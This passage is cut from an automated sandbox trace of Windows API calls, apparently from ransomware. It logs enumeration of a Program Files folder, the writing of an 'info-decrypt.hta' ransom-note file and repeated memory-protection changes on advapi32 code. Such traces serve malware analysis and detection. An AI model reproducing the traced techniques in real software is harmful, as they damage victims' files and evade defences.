ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0132.128] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c82ea80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xe62b8560, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe62b8560, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Google", cAlternateFileName="")) returned 1 [0132.128] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcd23a40, ftCreationTime.dwHighDateTime=0x1d68bac, ftLastAccessTime.dwLowDateTime=0xfcd23a40, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd23a40, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x4d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="info-decrypt.txt", cAlternateFileName="INFO-D~1.TXT")) returned 1 [0132.128] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe6161900, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe6161900, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0132.129] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x734f7d60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xe0a7f600, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe0a7f600, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 1 [0132.129] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1ae930, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe658bf80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe658bf80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Analysis Services", cAlternateFileName="MICROS~2")) returned 1 [0132.129] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef0a44f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef0a44f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef0a44f0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Office", cAlternateFileName="MICROS~1")) returned 1 [0132.129] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f11a30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xe6b59520, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe6b59520, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Visual Studio 8", cAlternateFileName="MICROS~3")) returned 1 [0132.129] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f1bbe30, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0xeab061a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xeab061a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.NET", cAlternateFileName="MICROS~1.NET")) returned 1 [0132.130] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaeef6000, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xe69904a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe69904a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mozilla Firefox", cAlternateFileName="MOZILL~1")) returned 1 [0132.130] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaf770e60, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xe62b8560, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe62b8560, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mozilla Maintenance Service", cAlternateFileName="MOZILL~2")) returned 1 [0132.130] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe696a340, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe696a340, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSBuild", cAlternateFileName="")) returned 1 [0132.130] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe63e9060, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe63e9060, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reference Assemblies", cAlternateFileName="REFERE~1")) returned 1 [0132.130] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x8907f814, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0xe69904a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe69904a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Uninstall Information", cAlternateFileName="UNINST~1")) returned 1 [0132.130] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xeab061a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xeab061a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Defender", cAlternateFileName="WINDOW~3")) returned 1 [0132.131] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd91d5ea, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe6187a60, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe6187a60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Mail", cAlternateFileName="WINDOW~1")) returned 1 [0132.131] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe626c2a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe626c2a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player", cAlternateFileName="WI54FB~1")) returned 1 [0132.131] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe6b59520, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe6b59520, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows NT", cAlternateFileName="WINDOW~2")) returned 1 [0132.131] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe5fbe9e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe5fbe9e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Photo Viewer", cAlternateFileName="WINDOW~4")) returned 1 [0132.131] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe4bcf1a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4bcf1a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Portable Devices", cAlternateFileName="WIBFE5~1")) returned 1 [0132.132] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe46e6440, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe46e6440, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WI4223~1")) returned 1 [0132.132] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x8f6eda4 | out: lpFindFileData=0x8f6eda4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0132.132] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0132.132] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6f02c) returned 1 [0132.132] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6f038) returned 1 [0132.132] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\desktop.ini", nBufferLength=0x105, lpBuffer=0x8f6eae0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\desktop.ini", lpFilePart=0x0) returned 0x22 [0132.132] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x8f6eae8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\info-decrypt.hta", lpFilePart=0x0) returned 0x27 [0132.132] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ef48) returned 1 [0132.132] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\info-decrypt.hta" (normalized: "c:\\program files (x86)\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x8f6efc4 | out: lpFileInformation=0x8f6efc4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0132.133] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ef44) returned 1 [0132.133] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\desktop.ini", nBufferLength=0x105, lpBuffer=0x8f6eae0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\desktop.ini", lpFilePart=0x0) returned 0x22 [0132.133] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x8f6e988, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\info-decrypt.hta", lpFilePart=0x0) returned 0x27 [0132.133] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee7c) returned 1 [0132.133] CreateFileW (lpFileName="C:\\Program Files (x86)\\info-decrypt.hta" (normalized: "c:\\program files (x86)\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x564 [0132.133] GetFileType (hFile=0x564) returned 0x1 [0132.133] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee78) returned 1 [0132.134] GetFileType (hFile=0x564) returned 0x1 [0132.135] WriteFile (in: hFile=0x564, lpBuffer=0x38d9b3c*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x8f6ef40, lpOverlapped=0x0 | out: lpBuffer=0x38d9b3c*, lpNumberOfBytesWritten=0x8f6ef40*=0x1000, lpOverlapped=0x0) returned 1 [0132.136] WriteFile (in: hFile=0x564, lpBuffer=0x38d9b3c*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x8f6ef14, lpOverlapped=0x0 | out: lpBuffer=0x38d9b3c*, lpNumberOfBytesWritten=0x8f6ef14*=0x55e, lpOverlapped=0x0) returned 1 [0132.136] CloseHandle (hObject=0x564) returned 1 [0132.137] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\desktop.ini", nBufferLength=0x105, lpBuffer=0x8f6eae8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\desktop.ini", lpFilePart=0x0) returned 0x22 [0132.137] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ef94) returned 1 [0132.137] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\desktop.ini" (normalized: "c:\\program files (x86)\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x38dab58 | out: lpFileInformation=0x38dab58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28ae853d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae)) returned 1 [0132.137] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ef90) returned 1 [0132.137] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\desktop.ini", nBufferLength=0x105, lpBuffer=0x8f6e9d4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\desktop.ini", lpFilePart=0x0) returned 0x22 [0132.137] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eec8) returned 1 [0132.137] CreateFileW (lpFileName="C:\\Program Files (x86)\\desktop.ini" (normalized: "c:\\program files (x86)\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x564 [0132.137] GetFileType (hFile=0x564) returned 0x1 [0132.137] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eec4) returned 1 [0132.137] GetFileType (hFile=0x564) returned 0x1 [0132.137] GetFileSize (in: hFile=0x564, lpFileSizeHigh=0x8f6efd0 | out: lpFileSizeHigh=0x8f6efd0*=0x0) returned 0xae [0132.137] ReadFile (in: hFile=0x564, lpBuffer=0x38dad94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x8f6ef7c, lpOverlapped=0x0 | out: lpBuffer=0x38dad94*, lpNumberOfBytesRead=0x8f6ef7c*=0xae, lpOverlapped=0x0) returned 1 [0132.138] CloseHandle (hObject=0x564) returned 1 [0135.595] SysReAllocStringLen (in: pbstr=0x8f6e2d8*=0x0, psz="advapi32", len=0x8 | out: pbstr=0x8f6e2d8*="advapi32") returned 1 [0135.595] CharLowerBuffW (in: lpsz="advapi32", cchLength=0x8 | out: lpsz="advapi32") returned 0x8 [0135.595] LoadLibraryExW (lpLibFileName="advapi32", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0135.596] GetLastError () returned 0x0 [0135.596] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0135.597] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0135.597] GetModuleFileNameA (in: hModule=0x77710000, lpFilename=0x8f6e1bc, nSize=0x105 | out: lpFilename="C:\\Windows\\syswow64\\ADVAPI32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")) returned 0x20 [0135.598] GetCurrentProcess () returned 0xffffffff [0135.598] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e2c0*=0x77711520, NumberOfBytesToProtect=0x8f6e2c4, NewAccessProtection=0x4, OldAccessProtection=0x8f6e2f8 | out: BaseAddress=0x8f6e2c0*=0x77711000, NumberOfBytesToProtect=0x8f6e2c4, OldAccessProtection=0x8f6e2f8*=0x20) returned 0x0 [0135.598] GetCurrentProcess () returned 0xffffffff [0135.598] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e2c0*=0x77711520, NumberOfBytesToProtect=0x8f6e2c4, NewAccessProtection=0x20, OldAccessProtection=0x8f6e2f8 | out: BaseAddress=0x8f6e2c0*=0x77711000, NumberOfBytesToProtect=0x8f6e2c4, OldAccessProtection=0x8f6e2f8*=0x4) returned 0x0 [0135.598] GetCurrentProcess () returned 0xffffffff [0135.598] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e2c0*=0x77711540, NumberOfBytesToProtect=0x8f6e2c4, NewAccessProtection=0x4, OldAccessProtection=0x8f6e2f8 | out: BaseAddress=0x8f6e2c0*=0x77711000, NumberOfBytesToProtect=0x8f6e2c4, OldAccessProtection=0x8f6e2f8*=0x20) returned 0x0 [0135.599] GetCurrentProcess () returned 0xffffffff [0135.599] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e2c0*=0x77711540, NumberOfBytesToProtect=0x8f6e2c4, NewAccessProtection=0x20, OldAccessProtection=0x8f6e2f8 | out: BaseAddress=0x8f6e2c0*=0x77711000, NumberOfBytesToProtect=0x8f6e2c4, OldAccessProtection=0x8f6e2f8*=0x4) returned 0x0 [0135.599] GetCurrentProcess () returned 0xffffffff [0135.599] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e2c0*=0x7771175c, NumberOfBytesToProtect=0x8f6e2c4, NewAccessProtection=0x4, OldAccessProtection=0x8f6e2f8 | out: BaseAddress=0x8f6e2c0*=0x77711000, NumberOfBytesToProtect=0x8f6e2c4, OldAccessProtection=0x8f6e2f8*=0x20) returned 0x0 [0135.600] GetCurrentProcess () returned 0xffffffff [0135.600] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e2c0*=0x7771175c, NumberOfBytesToProtect=0x8f6e2c4, NewAccessProtection=0x20, OldAccessProtection=0x8f6e2f8 | out: BaseAddress=0x8f6e2c0*=0x77711000, NumberOfBytesToProtect=0x8f6e2c4, OldAccessProtection=0x8f6e2f8*=0x4) returned 0x0 [0135.600] GetCurrentProcess () returned 0xffffffff [0135.600] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e2c0*=0x77711768, NumberOfBytesToProtect=0x8f6e2c4, NewAccessProtection=0x4, OldAccessProtection=0x8f6e2f8 | out: BaseAddress=0x8f6e2c0*=0x77711000, NumberOfBytesToProtect=0x8f6e2c4, OldAccessProtection=0x8f6e2f8*=0x20) returned 0x0 [0135.600] GetCurrentProcess () returned 0xffffffff [0135.600] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e2c0*=0x77711768, NumberOfBytesToProtect=0x8f6e2c4, NewAccessProtection=0x20, OldAccessProtection=0x8f6e2f8 | out: BaseAddress=0x8f6e2c0*=0x77711000, NumberOfBytesToProtect=0x8f6e2c4, OldAccessProtection=0x8f6e2f8*=0x4) returned 0x0 [0135.601] GetCurrentProcess () returned 0xffffffff [0135.601] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e2c0*=0x777117b8, NumberOfBytesToProtect=0x8f6e2c4, NewAccessProtection=0x4, OldAccessProtection=0x8f6e2f8 | out: BaseAddress=0x8f6e2c0*=0x77711000, NumberOfBytesToProtect=0x8f6e2c4, OldAccessProtection=0x8f6e2f8*=0x20) returned 0x0 [0135.601] GetCurrentProcess () returned 0xffffffff [0135.601] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e2c0*=0x777117b8, NumberOfBytesToProtect=0x8f6e2c4, NewAccessProtection=0x20, OldAccessProtection=0x8f6e2f8 | out: BaseAddress=0x8f6e2c0*=0x77711000, NumberOfBytesToProtect=0x8f6e2c4, OldAccessProtection=0x8f6e2f8*=0x4) returned 0x0 [0135.602] GetCurrentProcess () returned 0xffffffff [0135.602] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e2c0*=0x777117bc, NumberOfBytesToProtect=0x8f6e2c4, NewAccessProtection=0x4, OldAccessProtection=0x8f6e2f8 | out: BaseAddress=0x8f6e2c0*=0x77711000, NumberOfBytesToProtect=0x8f6e2c4, OldAccessProtection=0x8f6e2f8*=0x20) returned 0x0 [0135.602] GetCurrentProcess () returned 0xffffffff [0135.602] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e2c0*=0x777117bc, NumberOfBytesToProtect=0x8f6e2c4, NewAccessProtection=0x20, OldAccessProtection=0x8f6e2f8 | out: BaseAddress=0x8f6e2c0*=0x77711000, NumberOfBytesToProtect=0x8f6e2c4, OldAccessProtection=0x8f6e2f8*=0x4) returned 0x0 [0135.602] GetCurrentProcess () returned 0xffffffff [0135.602] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e2c0*=0x777117c8, NumberOfBytesToProtect=0x8f6e2c4, NewAccessProtection=0x4, OldAccessProtection=0x8f6e2f8 | out: BaseAddress=0x8f6e2c0*=0x77711000, NumberOfBytesToProtect=0x8f6e2c4, OldAccessProtection=0x8f6e2f8*=0x20) returned 0x0 [0135.603] GetCurrentProcess () returned 0xffffffff [0135.603] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e2c0*=0x777117c8, NumberOfBytesToProtect=0x8f6e2c4, NewAccessProtection=0x20, OldAccessProtection=0x8f6e2f8 | out: BaseAddress=0x8f6e2c0*=0x77711000, NumberOfBytesToProtect=0x8f6e2c4, OldAccessProtection=0x8f6e2f8*=0x4) returned 0x0 [0135.603] GetCurrentProcess () returned 0xffffffff [0135.603] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e2c0*=0x777117d0, NumberOfBytesToProtect=0x8f6e2c4, NewAccessProtection=0x4, OldAccessProtection=0x8f6e2f8 | out: BaseAddress=0x8f6e2c0*=0x77711000, NumberOfBytesToProtect=0x8f6e2c4, OldAccessProtection=0x8f6e2f8*=0x20) returned 0x0 [0135.603] GetCurrentProcess () returned 0xffffffff [0135.603] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e2c0*=0x777117d0, NumberOfBytesToProtect=0x8f6e2c4, NewAccessProtection=0x20, OldAccessProtection=0x8f6e2f8 | out: BaseAddress=0x8f6e2c0*=0x77711000, NumberOfBytesToProtect=0x8f6e2c4, OldAccessProtection=0x8f6e2f8*=0x4) returned 0x0 [0135.604] GetCurrentProcess () returned 0xffffffff [0135.604] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e2c0*=0x7771180c, NumberOfBytesToProtect=0x8f6e2c4, NewAccessProtection=0x4, OldAccessProtection=0x8f6e2f8 | out: BaseAddress=0x8f6e2c0*=0x77711000, NumberOfBytesToProtect=0x8f6e2c4, OldAccessProtection=0x8f6e2f8*=0x20) returned 0x0 [0135.604] GetCurrentProcess () returned 0xffffffff [0135.604] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e2c0*=0x7771180c, NumberOfBytesToProtect=0x8f6e2c4, NewAccessProtection=0x20, OldAccessProtection=0x8f6e2f8 | out: BaseAddress=0x8f6e2c0*=0x77711000, NumberOfBytesToProtect=0x8f6e2c4, OldAccessProtection=0x8f6e2f8*=0x4) returned 0x0 [0135.604] GetCurrentProcess () returned 0xffffffff [0135.605] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e2c0*=0x7771182c, NumberOfBytesToProtect=0x8f6e2c4, NewAccessProtection=0x4, OldAccessProtection=0x8f6e2f8 | out: BaseAddress=0x8f6e2c0*=0x77711000, NumberOfBytesToProtect=0x8f6e2c4, OldAccessProtection=0x8f6e2f8*=0x20) returned 0x0 [0135.605] GetCurrentProcess () returned 0xffffffff [0135.605] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e2c0*=0x7771182c, NumberOfBytesToProtect=0x8f6e2c4, NewAccessProtection=0x20, OldAccessProtection=0x8f6e2f8 | out: BaseAddress=0x8f6e2c0*=0x77711000, NumberOfBytesToProtect=0x8f6e2c4, OldAccessProtection=0x8f6e2f8*=0x4) returned 0x0 [0135.605] GetCurrentProcess () returned 0xffffffff [0135.605] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e2c0*=0x77711860, NumberOfBytesToProtect=0x8f6e2c4, NewAccessProtection=0x4, OldAccessProtection=0x8f6e2f8 | out: BaseAddress=0x8f6e2c0*=0x77711000, NumberOfBytesToProtect=0x8f6e2c4, OldAccessProtection=0x8f6e2f8*=0x20) returned 0x0 